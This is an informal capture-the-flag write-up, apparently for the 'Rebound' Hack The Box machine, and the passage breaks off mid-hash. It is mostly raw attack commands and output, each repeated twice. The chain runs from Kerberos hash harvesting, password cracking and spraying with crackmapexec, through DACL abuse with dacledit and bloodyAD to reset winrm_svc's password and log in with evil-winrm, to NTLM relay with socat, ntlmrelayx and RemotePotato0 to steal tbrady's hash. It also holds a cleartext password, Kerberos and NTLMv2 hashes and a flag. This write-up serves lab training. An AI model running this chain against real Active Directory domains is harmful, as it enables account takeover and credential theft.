$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$a04af3f4cf9e505bf6c7c06fc0c96343$5634da72443f6f743354c3d52d9126864f83c3a4245f71f6043991aa34f8323c26c19248257bafd3ce6e9c11329f01f79acccd1343dd69769b690e591e4c4d076647cddf50febc5fe05fa737655eb5203f440b3bfabadc4ad0548b6a3198a5e207bebd962073626c73cdfaadca5d3281ebd0a850e50c50b02a0fb05ffd141f24b3d267313cacc55829c0d13deed3f8a4e4f5877c958c92d41213e9a550048125cb60dcdc3af8703f76a0acbd6a404ef2f456b990b2e282f2defb8adfe688608d6a8cce60f16269f24c9147b4933846f70200cfc8372d40e17aaea578b624f5931cb032c6a82461ed6791016d6985ec75701b358e80e93f414a711b901063d1cb0989cec7f9e967ac183d6f08c1d6a714a6aa2125c6952b42ee0be5061e52ab3a84e9654ffb26caa781b75158416cc7c4f9fd2b02ab3848a01b81ab0f7d8356be8a5edcbaa644ff671f541f905a1b6401b292e95b5f751a0dd1ef43038d947e83c537cbcef3b3e9ac238923ae67562b214ee4a7a855d4f8c04727c26fbba95dd47bc80d05fac0e2ea64902ba430e18083476a346d052579fc8c8871f81d341b6d2a089f20529ff253e89cecf6ed5db477e5ca094f73519e3d746d536bd38b423a80f64322dd12669edf3b8c3321acb555aab966cb2d88b836f1159e880e0d6a29d0f0d83773589d47a8f7f6a22adb4af0de04f749f3c8a6183e7421796d639b8405045153dfc84fc93bd46e4bdd2505b497daee89a127e3c4b35a563aa6b043fd01705a5528ac4335fa81dfd6030cfaf39a5693464d3325ac98a2476bdf9fee777adf88ca3082bcbd7495b1b09bab95d4f7f26c16106373b7dc70b9ca98a9fbd799ed69ceb610fa32490db9f861f09455484640dd2f1770fd17a1a9db1c456bf667d1f22e58b890459a977793f230d9a1618449992a53601f43de533cc17829de721acd97e2876661577dc7a8207f89dce62359adfd138ae16961477d325502c2156985881f651a384d8bb591e6d502719f0025754a73a7522d1f902efd1e09d8c0e1af81773dd3a60c2d22cf60b3f5b17fd4d82ebcb42707447fea6cb47053ac2b9f03d75ff58ab4ae0c15ec292a8ade7c06bcd08a70e6147ecf1fdf89b039716bb6d33bfb155e33a7d83435cbfa0792573699a6705babf128d654f760392ef8674fb99f8ea21970899659351020deb486d81b280bc30a4405dd43e0a364fc270b575c7a1fe738eba01815cfacc35ec67ec24204a78c7ec72d6b6877da4fa8276b34037e92f81fd0a1928a6f32effdb4870bec80d97f5f56f37908b416540463b3db6342530a2a86c301f6c265996d000958a0db62300db8788b5b092b8ae2427a7a e
GetUserSPNs.py -no-preauth 'jjones' -usersfile pos_users -dc-host "10.10.11.231" -request rebound.htb/
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] Principal: administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$cb2f79a35a11c3a81cacd597$be23923aa136c2139a8a5101885302a72dcc522abf321ee8e787b6d343f5d733de09e0b29d6a2fb1110b96cfc4f6241aa545c3531c8830c9d5986766b12697df43a8c98716fe9b0e248db57d1fca1b01350fd591680a635fe9fd3e5bc97687c04200be3b3881ea5434edc00d091b4e55be19c8448807764de83680f0ff12e2ece49bc15380683248d9da22abd39faf80ad8e3eba92f11d35301f148a059c32aa73cbb69e432b6c2d2934c72c3ee522aac46585237160a88d29557dcd986a7be1b4788cfab04abb2787df885cc7838035be931180f58aac1acba6249a59669174ee4375859d82bcff7b6b62898eb283089ebc495d526775ca0859e7aefb834f360a63aecccbec9e4bd356a08b6c4fc4fdbcecc8f1d020b1db7c5117b7a93af2d7cd86707daae28832072831068fdbf9b5326174b450df7c33adce323140cd363c422821be7724f836b3a3c896052ac23d1b273ce247422d95a2c1563a32260150c4d831458077ee4186ccaa466d98c455609f2e514bbde5f2e7a47d3432019c1ee886d261aab59493b08a7170473f3fe59a3c4b4c5fc9d1579cc395e20ccafeaf0ee8aa03e0488aff7c1a3f4a73cecf7c58dcf4ab98d18dd296056946740c56a54528f3c5978260d95920070b7d2c35466cdc9f26125fcc9960a40d07f78447e6eeceba3096e6ae1979a29c88e9c6e62d8ed0a35cb33a8640772414f798c7be54e1908edbd492d01bef2fa9575fd8cebca993c44ffe62c621e6f3d44b2c34ff6c25259304ae3c16f9195a556b2be06db7215b99714bdda6f1dbf9635c0af7768f1c61faadd4422c49ea98022dcc7d4f33258f1f6ccbb29a063ad163ad7cb11c4cf076bf3dcc9ba85f0e6ab14211aef798a8138ba2f3ff6f5bbc805f1df3c3c8ae30cc14d19377f6bf145cfb219009284e0c3828cde29058b0f9c07795dcfb22b5070c51d29db01c4a14be6692444565fdfdd14c6e75111cd8aa3edc19d44185658ffa380837cc6eccacfc5bce4e3ceded49edd462b5f2a1071844c89606aecc5f8a08fc48c86c281d53020e8bf1ddd127b4083723862a2cecdf42ef3a4cf6ac4e9203440e8350abf306abc281bc9cc9957e936b914a63aead1f5fa7c3602f84d2df794bcaa8fb2bbd0539bfa3c4018c2e98d92649a062029ee639633099d2f5bdd43c254dd5eba7d0d4365911077fa98d477489092fe6eb7edab1d3258b318fecca951da7f67d8932ecde98370f943c46deb16a873820b6f11e8c568dd65b79fabe506d7841a3d904c703099491b43dac9d1db53a4998cf4f511d5ead270dd242c409d48eed3ded16244a5168a73c3c2ac3ba7f051539286310c1a1de139019a4fb3f2b12b5a26284499f
[-] Principal: ServiceMgmt - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ldap - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ldap_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: rpc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: rpc_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: smb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Servr not found in Kerberos database)
[-] Principal: smb_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$a04af3f4cf9e505bf6c7c06fc0c96343$5634da72443f6f743354c3d52d9126864f83c3a4245f71f6043991aa34f8323c26c19248257bafd3ce6e9c11329f01f79acccd1343dd69769b690e591e4c4d076647cddf50febc5fe05fa737655eb5203f440b3bfabadc4ad0548b6a3198a5e207bebd962073626c73cdfaadca5d3281ebd0a850e50c50b02a0fb05ffd141f24b3d267313cacc55829c0d13deed3f8a4e4f5877c958c92d41213e9a550048125cb60dcdc3af8703f76a0acbd6a404ef2f456b990b2e282f2defb8adfe688608d6a8cce60f16269f24c9147b4933846f70200cfc8372d40e17aaea578b624f5931cb032c6a82461ed6791016d6985ec75701b358e80e93f414a711b901063d1cb0989cec7f9e967ac183d6f08c1d6a714a6aa2125c6952b42ee0be5061e52ab3a84e9654ffb26caa781b75158416cc7c4f9fd2b02ab3848a01b81ab0f7d8356be8a5edcbaa644ff671f541f905a1b6401b292e95b5f751a0dd1ef43038d947e83c537cbcef3b3e9ac238923ae67562b214ee4a7a855d4f8c04727c26fbba95dd47bc80d05fac0e2ea64902ba430e18083476a346d052579fc8c8871f81d341b6d2a089f20529ff253e89cecf6ed5db477e5ca094f73519e3d746d536bd38b423a80f64322dd12669edf3b8c3321acb555aab966cb2d88b836f1159e880e0d6a29d0f0d83773589d47a8f7f6a22adb4af0de04f749f3c8a6183e7421796d639b8405045153dfc84fc93bd46e4bdd2505b497daee89a127e3c4b35a563aa6b043fd01705a5528ac4335fa81dfd6030cfaf39a5693464d3325ac98a2476bdf9fee777adf88ca3082bcbd7495b1b09bab95d4f7f26c16106373b7dc70b9ca98a9fbd799ed69ceb610fa32490db9f861f09455484640dd2f1770fd17a1a9db1c456bf667d1f22e58b890459a977793f230d9a1618449992a53601f43de533cc17829de721acd97e2876661577dc7a8207f89dce62359adfd138ae16961477d325502c2156985881f651a384d8bb591e6d502719f0025754a73a7522d1f902efd1e09d8c0e1af81773dd3a60c2d22cf60b3f5b17fd4d82ebcb42707447fea6cb47053ac2b9f03d75ff58ab4ae0c15ec292a8ade7c06bcd08a70e6147ecf1fdf89b039716bb6d33bfb155e33a7d83435cbfa0792573699a6705babf128d654f760392ef8674fb99f8ea21970899659351020deb486d81b280bc30a4405dd43e0a364fc270b575c7a1fe738eba01815cfacc35ec67ec24204a78c7ec72d6b6877da4fa8276b34037e92f81fd0a1928a6f32effdb4870bec80d97f5f56f37908b416540463b3db6342530a2a86c301f6c265996d000958a0db62300db8788b5b092b8ae2427a7a
e
i got 2 hashes, 1 for ldap and the otherone for ldap_monitor, and i could only Crack the hash for the ldap_monitor
with taht password, i tried a password spy for all the users on the domain
cme smb rebound.htb -u pos_users -p passwords --continue-on-success SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) SMB 10.10.11.231 445 DC01 [-] rebound.htb\administrator:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [+] rebound.htb\ServiceMgmt:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\winrm:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_svc:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc_svc:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb_svc:1GR8t@$$4u SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
cme smb rebound.htb -u pos_users -p passwords --continue-on-success
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [-] rebound.htb\administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ServiceMgmt:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\winrm:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\rpc_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\smb_svc:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
and the weird thing is that it worked for many users
but by having password i could use rusthound to dump the domain information, so i did that
> rusthound -d rebound.htb -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' --fqdn-resolver --adcs -z -i 10.10.11.231 --old-bloodhound -n 10.10.11.231 --ldaps --------------------------------------------------- Initializing RustHound at 17:29:20 on 11/20/23 Powered by g0h4n from OpenCyber --------------------------------------------------- [2023-11-20T22:29:20Z INFO rusthound] Verbosity level: Info [2023-11-20T22:29:21Z INFO rusthound::ldap] Connected to REBOUND.HTB Active Directory! [2023-11-20T22:29:21Z INFO rusthound::ldap] Starting data collection... [2023-11-20T22:29:23Z INFO rusthound::ldap] All data collected for NamingContext DC=rebound,DC=htb [2023-11-20T22:29:24Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=rebound,DC=htb [2023-11-20T22:29:24Z INFO rusthound::json::parser] Starting the LDAP objects parsing... ⢀ Parsing LDAP objects: 24% [2023-11-20T22:29:24Z INFO rusthound::modules::adcs::parser] Found 11 enabled certificate templates [2023-11-20T22:29:24Z INFO rusthound::json::parser] Parsing LDAP objects finished! [2023-11-20T22:29:24Z INFO rusthound::json::checker] Starting checker to replace some values... [2023-11-20T22:29:24Z INFO rusthound::json::checker] Checking and replacing some values finished! [2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address started... [2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] IP address for DC01.REBOUND.HTB: 10.10.11.231 [2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address finished! [2023-11-20T22:29:24Z INFO rusthound::modules] Starting checker for ADCS values... [2023-11-20T22:29:24Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://dc01.rebound.htb/certsrv/, please try manually and check for https access if EPA is enable. [2023-11-20T22:29:24Z INFO rusthound::modules] Checking for ADCS values finished! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 16 users parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 61 groups parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 computers parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 ous parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 domains parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 cas parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 33 templates parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 gpos parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] 21 containers parsed! [2023-11-20T22:29:24Z INFO rusthound::json::maker] .//20231120172924_rebound-htb_rusthound.zip created! RustHound Enumeration Completed at 17:29:24 on 11/20/23! Happy Graphing!
> rusthound -d rebound.htb -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' --fqdn-resolver --adcs -z -i 10.10.11.231 --old-bloodhound -n 10.10.11.231 --ldaps
---------------------------------------------------
Initializing RustHound at 17:29:20 on 11/20/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-11-20T22:29:20Z INFO rusthound] Verbosity level: Info
[2023-11-20T22:29:21Z INFO rusthound::ldap] Connected to REBOUND.HTB Active Directory!
[2023-11-20T22:29:21Z INFO rusthound::ldap] Starting data collection...
[2023-11-20T22:29:23Z INFO rusthound::ldap] All data collected for NamingContext DC=rebound,DC=htb
[2023-11-20T22:29:24Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=rebound,DC=htb
[2023-11-20T22:29:24Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 24% [2023-11-20T22:29:24Z INFO rusthound::modules::adcs::parser] Found 11 enabled certificate templates
[2023-11-20T22:29:24Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-11-20T22:29:24Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-11-20T22:29:24Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address started...
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] IP address for DC01.REBOUND.HTB: 10.10.11.231
[2023-11-20T22:29:24Z INFO rusthound::modules::resolver::resolv] Resolving FQDN to IP address finished!
[2023-11-20T22:29:24Z INFO rusthound::modules] Starting checker for ADCS values...
[2023-11-20T22:29:24Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://dc01.rebound.htb/certsrv/, please try manually and check for https access if EPA is enable.
[2023-11-20T22:29:24Z INFO rusthound::modules] Checking for ADCS values finished!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 16 users parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 61 groups parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 computers parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 ous parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 domains parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 1 cas parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 33 templates parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] 21 containers parsed!
[2023-11-20T22:29:24Z INFO rusthound::json::maker] .//20231120172924_rebound-htb_rusthound.zip created!
RustHound Enumeration Completed at 17:29:24 on 11/20/23! Happy Graphing!
put all the data on bloodhound
and started analyzing it
after trying to find a good path to exploit, i found a possible path, but the 2 users that had control over the group were not pwned. o just had oorend and ldap_monitor, and those users did not reflected any priviledge in bloodhound
those users were ppaul and fflock, but my user did not was on the ServiceMGMT group , so i did not had generic write over winrm_svc.
after a while and reading in forums, i realized that due to the fact that bloodhound does not include ACL information, it will not being displayed , so i needed to do it manually
since i knewed that serviceMGMT was the interesting group, i ran the program pointing to that group
dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps -k Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Parsing DACL [*] Printing parsed DACL [*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682) [*] ACE[2] info [*] ACE Type : ACCESS_ALLOWED_ACE [*] ACE flags : None [*] Access mask : Self (0x8) [*] Trustee (SID) : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*] ACE[2] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : None
[*] Access mask : Self (0x8)
[*] Trustee (SID) : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)that ACCESS_ALLOWED_ACE mean that i can write myself to the group, so i used a tool called BloodyAD which allowed me to write myself there
due to the fact that i had that priviledge on myself, i could add to the group SERVICEMGMT, and then add full control over Service Users , and then abusing that priviledge to reset the password of the user winrm_svc and in that way connect using evil-winrm
1.ADD TO THE SERVICEMGMT
NOTE:
1 important thing to highligh from this box, is that the ntlm authentication was disable, and since i was going to use ldap, i had couple of issues by authenticating by just using the password, so for every action i did , i requested a ticket as that user before to do something
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 add groupMember SERVICEMGMT oorend [+] oorend added to SERVICEMGMT
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] oorend added to SERVICEMGMT2. ALLOW FULL ACCES OVER SERVICE USERS
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in oorend.ccache lucas@parrot ~/machines/rebound/content/bloodyAD main export KRB5CCNAME=oorend.ccache lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=service users,DC=REBOUND,dc=htb' 'rebound.htb/oorend' -use-ldaps -k -no-pass -dc-ip 10.10.11.231 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20231122-234007.bak [*] DACL modified successfully!
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main export KRB5CCNAME=oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=service users,DC=REBOUND,dc=htb' 'rebound.htb/oorend' -use-ldaps -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20231122-234007.bak
[*] DACL modified successfully!in that way, i was able to set reset password to the user winrm_svc
3. set Reset password attribute over winrm_svc
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231 Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra [*] Saving ticket in oorend.ccache lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'ResetPassword' -principal 'oorend' -target 'winrm_svc' -dc-ip dc01.rebound.htb -use-ldaps -k -no-pass 'rebound.htb/oorend' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] DACL backed up to dacledit-20231122-234109.bak [*] DACL modified successfully!
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'ResetPassword' -principal 'oorend' -target 'winrm_svc' -dc-ip dc01.rebound.htb -use-ldaps -k -no-pass 'rebound.htb/oorend'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] DACL backed up to dacledit-20231122-234109.bak
[*] DACL modified successfully!now with taht priv, i just setted the password of him as whatever i wanted
RESET PASSWORD WINRM_SVC
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Solokami123# [+] Password changed successfully!
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Solokami123#
[+] Password changed successfully!then after changin the password i just connected as him via winrm and then send a rev shell to my box as him, because the passoword was being reseted each period of time, so to have a good persistence i just did that
CONNECT VIA WINRM
lucas@parrot ~/backup/evil-winrm master evil-winrm -i 10.10.11.231 -u 'winrm_svc' -p 'Solokami123#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>lucas@parrot ~/backup/evil-winrm master evil-winrm -i 10.10.11.231 -u 'winrm_svc' -p 'Solokami123#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>USER .TXT
and in that way i could grab the user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\desktop\user.txt 74eb0cf862c526d25a321da25b030d74
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\desktop\user.txt
74eb0cf862c526d25a321da25b030d74PRIV ESC
the path for priv esc, was clear but hard, because i could see that the user TBRADY can read GMSA password of the MachineAccount with name DELEGATOR$ and that machine account , has the priviledge allowed to delegate over the dc01, but there was a couple of issues here, first i needed to find how to get to that user
and the dc01 as always have dcsync with the domain so i could dump the sam and grab all the hashes from the domain
but first i needed the user tbrady
ENUM THE BOX LOCALLY With WINPEAS
PS C:\ProgramData> copy \\10.10.14.15\smb\winPEAS.exe PS C:\ProgramData> .\winPEAS.exe `` so i started enumerating the box to be able to reach to that user
PS C:\ProgramData> copy \\10.10.14.15\smb\winPEAS.exe
PS C:\ProgramData> .\winPEAS.exe
``
so i started enumerating the box to be able to reach to that userit failed, at half way, so it was kind of complex to find the way to the user, since i did not knew how, however since i did not had a specific path, i could try to poisoning everything using remotepotatoe , ntlmrealy.py and socat to forward all the login event to my box and be able to steal the hash of a possible user that would connect to the box, so i needed to upload remote potatoe to the box , forward the port 135 to the target port that i forwarded from the box, and start ntlmrelay
RELAY WITH REMOTEPOTATOE
1.set up socat
lucas@parrot ~/machines/rebound sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
lucas@parrot ~/machines/rebound sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:99992.set up ntlm Relay
sudo ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc │
sudo ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc │3 poisong authentications from iside the box with remotepotatoe
PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.10.14.15 -x 10.10.14.15 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. R
emember to forward tcp port 135 on 10.10.14.15 to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:c67e86d5206fee69:8bec5d7e00ab42bdf9775aef77317d21:0101000000000000fdb2cc76ca1d
